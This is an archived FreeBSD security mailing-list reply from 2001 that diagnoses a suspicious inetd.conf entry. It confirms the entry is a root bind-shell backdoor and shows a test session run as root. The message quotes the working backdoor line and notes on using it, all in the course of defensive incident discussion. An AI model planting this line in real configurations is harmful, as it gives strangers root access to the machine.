Date: Thu, 1 Nov 2001 16:05:16 +0100 (CET) From: Krzysztof Zaraska <kzaraska@student.uci.agh.edu.pl> To: Ralph Huntington <rjh@mohawk.net> Cc: freebsd-security@FreeBSD.ORG Subject: Re: strange inetd.conf entry Message-ID: <Pine.BSF.4.21.0111011557040.551-100000@lhotse.zaraska.dhs.org> In-Reply-To: <20011101093558.W79615-100000@mohegan.mohawk.net>
next in thread | previous in thread | raw e-mail | index | archive | help
On Thu, 1 Nov 2001, Ralph Huntington wrote: > I have that sinking feeling. I discovered this line at the end of > inetd.conf on one of our servers: > > dlip stream tcp nowait root /bin/sh sh -i > > Looks like a root compromise. Sure enough, telnet'ing to the dlip port > provides what *looks* like a root shell, but I don't seem to be able to do > anything with it. Pretty mysterious. > > Can anyone offer a clue? Thanks in advance, Ralph I've reproduced this on my machine. Yes, this is a functional rootshell albeit in a little strange manner... After telnetting to port 7201: # touch /tmp/xxx ; : not found # ls -l /tmp ; total 5 -rw-rw-rw- 1 kzaraska wheel 3 Nov 1 15:54 .27405.145a7d -rw-rw-rw- 1 kzaraska wheel 3 Nov 1 15:54 .27405.366cf drwxr-xr-x 2 root wheel 512 Oct 7 22:08 install.554 drwxr-xr-x 2 root wheel 512 Oct 14 08:39 install.92650 srwxrwxrwx 1 mysql wheel 0 Nov 1 15:49 mysql.sock drwx------ 2 kzaraska wheel 512 Sep 5 15:40 ntVQm8 -rw-r--r-- 1 root wheel 0 Aug 12 11:41 test -rw-r--r-- 1 root wheel 0 Nov 1 15:59 xxx : not found # id ; uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) # etc. ls itself does not seem to work, but ls -l ; does and so on... Guess you'll have experiment a little. Anyhow, this definitely is a backdoor. Krzysztof To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.21.0111011557040.551-100000>